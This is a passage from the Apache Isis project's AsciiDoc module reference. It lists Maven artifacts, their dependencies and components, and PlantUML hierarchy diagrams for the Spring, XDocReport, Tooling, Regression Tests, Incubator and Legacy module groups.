+\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.hsqldb:hsqldb:jar:<managed> +\n****\n\n|Apache Isis Sub - Excel (testing support)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-excel-testing\nType: jar\nDirectory: \/subdomains\/excel\/testing\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.subdomains:isis-subdomains-excel-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/excel\/testing\/ExcelFixture.adoc[ExcelFixture], xref:refguide:subdomains:index\/excel\/testing\/ExcelFixture2.adoc[ExcelFixture2], xref:refguide:subdomains:index\/excel\/testing\/ExcelFixtureRowHandler.adoc[ExcelFixtureRowHandler], xref:refguide:subdomains:index\/excel\/testing\/ExcelFixtureWorkbookHandler.adoc[ExcelFixtureWorkbookHandler], xref:refguide:subdomains:index\/excel\/testing\/FixtureAwareRowHandler.adoc[FixtureAwareRowHandler], xref:refguide:subdomains:index\/excel\/testing\/IsisModuleSubdomainsExcelTesting.adoc[IsisModuleSubdomainsExcelTesting]\n****\n|===\n\n=== Spring\n\n[plantuml,Spring,svg]\n----\n@startuml(id=Spring)\ntitle Spring - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Spring\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - Spring (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - Spring (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Spring)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Sub - Spring (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-spring\nType: pom\nDirectory: \/subdomains\/spring\n----\n|Utility services for interacting with the Spring application context (that hosts the Apache Isis application itself)\n\n|Apache Isis Sub - Spring (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-spring-applib\nType: jar\nDirectory: \/subdomains\/spring\/applib\n----\n|.Components\n****\no.a.i.subdomains.spring.applib.service.SpringBeansService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/spring\/applib\/IsisModuleSubdomainsSpringApplib.adoc[IsisModuleSubdomainsSpringApplib], xref:refguide:subdomains:index\/spring\/applib\/service\/BeanDescriptor.adoc[BeanDescriptor], xref:refguide:subdomains:index\/spring\/applib\/service\/ContextBeans.adoc[ContextBeans], xref:refguide:subdomains:index\/spring\/applib\/service\/SpringBeansService.adoc[SpringBeansService]\n****\n|===\n\n=== XDocReport\n\n[plantuml,XDocReport,svg]\n----\n@startuml(id=XDocReport)\ntitle XDocReport - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam 
rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"XDocReport\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - XdocReport (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - XdocReport (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (XDocReport)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Sub - XdocReport (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-xdocreport\nType: pom\nDirectory: \/subdomains\/xdocreport\n----\n|Integrates XDoc Report Library\n\n|Apache Isis Sub - XdocReport (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-xdocreport-applib\nType: jar\nDirectory: \/subdomains\/xdocreport\/applib\n----\n|.Components\n****\no.a.i.subdomains.xdocreport.applib.service.XDocReportService +\n****\n\n.Dependencies\n****\nfr.opensagres.xdocreport:fr.opensagres.xdocreport.converter.docx.xwpf:jar:<managed> +\nfr.opensagres.xdocreport:fr.opensagres.xdocreport.document.docx:jar:<managed> +\nfr.opensagres.xdocreport:fr.opensagres.xdocreport.template.freemarker:jar:<managed> +\nfr.opensagres.xdocreport:org.apache.poi.xwpf.converter.core:jar:<managed> +\nfr.opensagres.xdocreport:org.apache.poi.xwpf.converter.pdf:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:subdomains:index\/xdocreport\/applib\/IsisModuleSubdomainsXDocReportApplib.adoc[IsisModuleSubdomainsXDocReportApplib], xref:refguide:subdomains:index\/xdocreport\/applib\/service\/OutputType.adoc[OutputType], xref:refguide:subdomains:index\/xdocreport\/applib\/service\/XDocReportModel.adoc[XDocReportModel], xref:refguide:subdomains:index\/xdocreport\/applib\/service\/XDocReportService.adoc[XDocReportService]\n****\n|===\n\n== Tooling\n\n[plantuml,Tooling,svg]\n----\n@startuml(id=Tooling)\ntitle Tooling - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Tooling\\n[Software System]\" {\n rectangle \"==Apache Isis - Tooling\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis - Tooling - C4 Modeling\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis - Tooling - CLI (Command Line Interface)\\n<size:10>[Container: packaging: 
jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis - Tooling - Java Model (Code Mining)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis - Tooling - Java to Asciidoc (Code Mining)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis - Tooling - Model for AsciiDoc\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis - Tooling - Project Model (Code mining)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 8 : \"\"\n@enduml\n----\n.Projects\/Modules (Tooling)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis - Tooling\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling\nType: pom\nDirectory: \/tooling\n----\n|Libraries and tools not depending on the _Apache Isis Core_ ecosystem,\neg. code mining, automated documentation.\n(Targeted for JVM 11+)\n\n.Dependencies\n****\ncom.google.code.findbugs:annotations:jar:3.0.1u2 +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> +\norg.junit.jupiter:junit-jupiter-engine:jar:<managed> +\norg.junit.vintage:junit-vintage-engine:jar:<managed> +\norg.mapstruct:mapstruct-processor:jar:1.4.2.Final +\norg.projectlombok:lombok:jar:<managed> +\norg.slf4j:slf4j-api:jar:<managed> +\norg.springframework.boot:spring-boot-starter-log4j2:jar:<managed> +\n****\n\n|Apache Isis - Tooling - C4 Modeling\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-c4modeling\nType: jar\nDirectory: \/tooling\/c4modeling\n----\n|Library for programmatic C4 Model generation.\n\nSee https:\/\/c4model.com\/\n\n.Dependencies\n****\ncom.structurizr:structurizr-core:jar:<managed> +\ncom.structurizr:structurizr-plantuml:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\n****\n\n|Apache Isis - Tooling - CLI (Command Line Interface)\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-cli\nType: jar\nDirectory: \/tooling\/cli\n----\n|Command Line Interface for the _Apache Isis Tooling_ ecosystem.\n\n.Dependencies\n****\ninfo.picocli:picocli:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-c4modeling:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-java2adoc:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-javamodel:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-model4adoc:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-projectmodel:jar:<managed> +\n****\n\n|Apache Isis - Tooling - Java to Asciidoc (Code Mining)\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-java2adoc\nType: jar\nDirectory: \/tooling\/java2adoc\n----\n|Code mining library for Java source to Asciidoc conversion.\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-javamodel:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-model4adoc:jar:<managed> +\norg.jsoup:jsoup:jar:<managed> +\n****\n\n|Apache Isis - Tooling - Java Model (Code Mining)\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-javamodel\nType: jar\nDirectory: \/tooling\/javamodel\n----\n|Code mining library for Java bytecode introspection.\n\n.Dependencies\n****\ncom.github.andi-huber:code-assert:jar:-SNAPSHOT +\ncom.github.javaparser:javaparser-core:jar:${javaparser.version} 
+\norg.apache.isis.commons:isis-commons:jar:<managed> +\n****\n\n|Apache Isis - Tooling - Model for AsciiDoc\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-model4adoc\nType: jar\nDirectory: \/tooling\/model4adoc\n----\n|Library for programmatic AsciiDoc generation.\n\nThe AsciiDoc name is trademarked by the Eclipse Foundation (https:\/\/www.eclipse.org\/).\nThis project is *not* part of the specification effort for _AsciiDoc_ under the\nAsciiDoc Working Group. See https:\/\/projects.eclipse.org\/proposals\/asciidoc-language\nand https:\/\/accounts.eclipse.org\/mailing-list\/asciidoc-wg. However, we are happy to\nhelp with transfer of source code, if any project (under the umbrella of the\nAsciiDoc Working Group) is willing to take over.\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.asciidoctor:asciidoctorj:jar:<managed> +\n****\n\n|Apache Isis - Tooling - Project Model (Code mining)\n[source,yaml]\n----\nGroup: org.apache.isis.tooling\nArtifact: isis-tooling-projectmodel\nType: jar\nDirectory: \/tooling\/projectmodel\n----\n|Code mining library for Gradle\/Maven project module tree introspection.\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.maven:maven-model-builder:jar:<managed> +\norg.gradle:gradle-tooling-api:jar:<managed> +\n****\n|===\n\n== Regression Tests\n\n[plantuml,Regression Tests,svg]\n----\n@startuml(id=Regression_Tests)\ntitle Regression Tests - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Regression Tests\\n[Software System]\" {\n rectangle \"==Apache Isis - Regression Tests\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis - Regression Tests (stable)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Regression Tests)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis - Regression Tests\n[source,yaml]\n----\nGroup: org.apache.isis.regressiontests\nArtifact: isis-regressiontests\nType: pom\nDirectory: \/regressiontests\n----\n|Collection of JUnit tests covering core functionalities of the framework.\n(Targeted for JVM 11+)\n\n.Dependencies\n****\norg.apache.directory.server:apacheds-test-framework:jar:2.0.0.AM26 +\norg.apache.isis.extensions:isis-extensions-modelannotation:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-encryption-jbcrypt:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-persistence-jdo:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-shiro-realm:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-shiro-realm-ldap-impl:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-restclient-applib:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-integtests:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdk11:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jpa:pom:<managed> 
+\norg.apache.isis.mavendeps:isis-mavendeps-webapp:pom:<managed> +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-specsupport-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-model4adoc:jar:${project.version} +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\norg.glassfish:javax.json:jar:1.1.4 +\norg.glassfish.jersey.ext:jersey-spring5:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis - Regression Tests (stable)\n[source,yaml]\n----\nGroup: org.apache.isis.regressiontests\nArtifact: isis-regressiontests-stable\nType: jar\nDirectory: \/regressiontests\/stable\n----\n|.Components\n****\no.a.i.testdomain.applayer.ApplicationLayerTestFactory +\no.a.i.testdomain.applayer.ApplicationLayerTestFactory$PreCommitListener +\no.a.i.testdomain.applayer.publishing.CommandSubscriberForTesting +\no.a.i.testdomain.applayer.publishing.EntityChangesSubscriberForTesting +\no.a.i.testdomain.applayer.publishing.EntityPropertyChangeSubscriberForTesting +\no.a.i.testdomain.applayer.publishing.ExecutionSubscriberForTesting +\no.a.i.testdomain.conf.Configuration_headless$HeadlessCommandSupport +\no.a.i.testdomain.jdo.JdoInventoryDao +\no.a.i.testdomain.jpa.JpaInventoryDao +\no.a.i.testdomain.jpa.springdata.EmployeeRepository +\no.a.i.testdomain.util.interaction.InteractionBoundaryProbe +\no.a.i.testdomain.util.kv.KVStoreForTesting +\no.a.i.testdomain.util.rest.RestEndpointService +\n****\n\n.Dependencies\n****\norg.apache.isis.extensions:isis-extensions-cors-impl:jar:<managed> +\norg.glassfish.jersey.ext:jersey-spring5:jar:<managed> +\n****\n|===\n\n== Incubator\n\n[plantuml,Incubator,svg]\n----\n@startuml(id=Incubator)\ntitle Incubator - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Incubator\\n[Software System]\" {\n rectangle \"==Apache Isis Incubator\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Incubator)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Incubator\n[source,yaml]\n----\nGroup: org.apache.isis.incubator\nArtifact: isis-incubator\nType: pom\nDirectory: \/incubator\n----\n|Collection of Apache Isis extensions, subdomains or BC mappings, currently incubating.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n|===\n\n=== Kroviz Client\n\n[plantuml,Kroviz Client,svg]\n----\n@startuml(id=Kroviz_Client)\ntitle Kroviz Client - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Kroviz Client\\n[Software System]\" {\n rectangle \"==Apache Isis Inc - Client kroViz\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Kroviz Client)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates 
|Description \n\n|Apache Isis Inc - Client kroViz\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.clients\nArtifact: isis-client-kroviz\nType: jar\nDirectory: \/incubator\/clients\/kroviz\n----\n|Initial sketches\n|===\n\n=== JavaFX Viewer\n\n[plantuml,JavaFX Viewer,svg]\n----\n@startuml(id=JavaFX_Viewer)\ntitle JavaFX Viewer - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"JavaFX Viewer\\n[Software System]\" {\n rectangle \"==Apache Isis Inc - Viewer JavaFX\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Inc - Viewer JavaFX (Model)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Inc - Viewer JavaFX (UI Components)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Inc - Viewer JavaFX (Viewer)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n@enduml\n----\n.Projects\/Modules (JavaFX Viewer)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Inc - Viewer JavaFX\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-javafx\nType: pom\nDirectory: \/incubator\/viewers\/javafx\n----\n|Initial sketches\n\n|Apache Isis Inc - Viewer JavaFX (Model)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-javafx-model\nType: jar\nDirectory: \/incubator\/viewers\/javafx\/model\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\norg.openjfx:javafx-base:jar:<managed> +\norg.openjfx:javafx-controls:jar:<managed> +\norg.openjfx:javafx-fxml:jar:<managed> +\norg.openjfx:javafx-swing:jar:<managed> +\norg.openjfx:javafx-web:jar:<managed> +\n****\n\n|Apache Isis Inc - Viewer JavaFX (UI Components)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-javafx-ui\nType: jar\nDirectory: \/incubator\/viewers\/javafx\/ui\n----\n|.Components\n****\no.a.i.incubator.viewer.javafx.ui.components.UiComponentFactoryFx +\no.a.i.incubator.viewer.javafx.ui.components.markup.MarkupFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.number.NumberFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.objectref.ObjectReferenceFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.other.FallbackFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.temporal.TemporalFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.text.TextFieldFactory +\no.a.i.incubator.viewer.javafx.ui.decorator.disabling.DisablingDecoratorForButton +\no.a.i.incubator.viewer.javafx.ui.decorator.disabling.DisablingDecoratorForFormField +\no.a.i.incubator.viewer.javafx.ui.decorator.icon.IconDecoratorForLabeled +\no.a.i.incubator.viewer.javafx.ui.decorator.icon.IconDecoratorForMenuItem 
+\no.a.i.incubator.viewer.javafx.ui.decorator.icon.IconServiceDefault +\no.a.i.incubator.viewer.javafx.ui.decorator.prototyping.PrototypingDecoratorForButton +\no.a.i.incubator.viewer.javafx.ui.decorator.prototyping.PrototypingDecoratorForFormField +\no.a.i.incubator.viewer.javafx.ui.decorator.prototyping.PrototypingInfoPopupProvider +\no.a.i.incubator.viewer.javafx.ui.main.MainViewFx +\no.a.i.incubator.viewer.javafx.ui.main.UiActionHandlerFx +\no.a.i.incubator.viewer.javafx.ui.main.UiBuilderFx +\no.a.i.incubator.viewer.javafx.ui.main.UiContextFxDefault +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.incubator.viewer:isis-viewer-javafx-model:jar:<managed> +\n****\n\n|Apache Isis Inc - Viewer JavaFX (Viewer)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-javafx-viewer\nType: jar\nDirectory: \/incubator\/viewers\/javafx\/viewer\n----\n|.Dependencies\n****\norg.apache.isis.incubator.viewer:isis-viewer-javafx-ui:jar:<managed> +\n****\n|===\n\n=== Vaadin Viewer\n\n[plantuml,Vaadin Viewer,svg]\n----\n@startuml(id=Vaadin_Viewer)\ntitle Vaadin Viewer - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Vaadin Viewer\\n[Software System]\" {\n rectangle \"==Apache Isis Inc - Viewer Vaadin\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Inc - Viewer Vaadin (Model)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Inc - Viewer Vaadin (UI Components)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Inc - Viewer Vaadin (Viewer)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n@enduml\n----\n.Projects\/Modules (Vaadin Viewer)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Inc - Viewer Vaadin\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-vaadin\nType: pom\nDirectory: \/incubator\/viewers\/vaadin\n----\n|Initial sketches\n\n|Apache Isis Inc - Viewer Vaadin (Model)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-vaadin-model\nType: jar\nDirectory: \/incubator\/viewers\/vaadin\/model\n----\n|.Dependencies\n****\ncom.github.fge:jackson-coreutils:jar:1.8 +\ncom.vaadin:vaadin:jar:<managed> +\nio.swagger:swagger-compat-spec-parser:jar:1.0.39 +\nio.swagger:swagger-parser:jar:1.0.39 +\nio.swagger.core.v3:swagger-core:jar:2.0.5 +\nio.swagger.core.v3:swagger-models:jar:2.0.5 +\nio.swagger.parser.v3:swagger-parser-core:jar:2.0.5 +\nio.swagger.parser.v3:swagger-parser-v3:jar:2.0.5 +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\n****\n\n|Apache Isis Inc - Viewer Vaadin (UI 
Components)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-vaadin-ui\nType: jar\nDirectory: \/incubator\/viewers\/vaadin\/ui\n----\n|.Components\n****\no.a.i.incubator.viewer.vaadin.ui.auth.LogoutHandlerVaa +\no.a.i.incubator.viewer.vaadin.ui.auth.VaadinAuthenticationHandler +\no.a.i.incubator.viewer.vaadin.ui.components.UiComponentFactoryVaa +\no.a.i.incubator.viewer.vaadin.ui.components.blob.BlobFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.clob.ClobFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.markup.MarkupFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.other.FallbackFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.temporal.TemporalFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.text.TextFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.text.uuid.UuidFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.pages.main.UiActionHandlerVaa +\no.a.i.incubator.viewer.vaadin.ui.pages.main.UiContextVaaDefault +\n****\n\n.Dependencies\n****\ncom.vaadin:vaadin-spring:jar:<managed> +\ncommons-fileupload:commons-fileupload:jar:1.4 +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.incubator.viewer:isis-viewer-vaadin-model:jar:<managed> +\n****\n\n|Apache Isis Inc - Viewer Vaadin (Viewer)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-vaadin-viewer\nType: jar\nDirectory: \/incubator\/viewers\/vaadin\/viewer\n----\n|.Dependencies\n****\norg.apache.isis.incubator.viewer:isis-viewer-vaadin-ui:jar:<managed> +\n****\n|===\n\n== Legacy\n\n[plantuml,Legacy,svg]\n----\n@startuml(id=Legacy)\ntitle Legacy - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Legacy\\n[Software System]\" {\n rectangle \"==Apache Isis Legacy\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Legacy - Applib\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Legacy - Commons\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Legacy - Metamodel\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Legacy - REST Client\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Legacy - Runtime\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 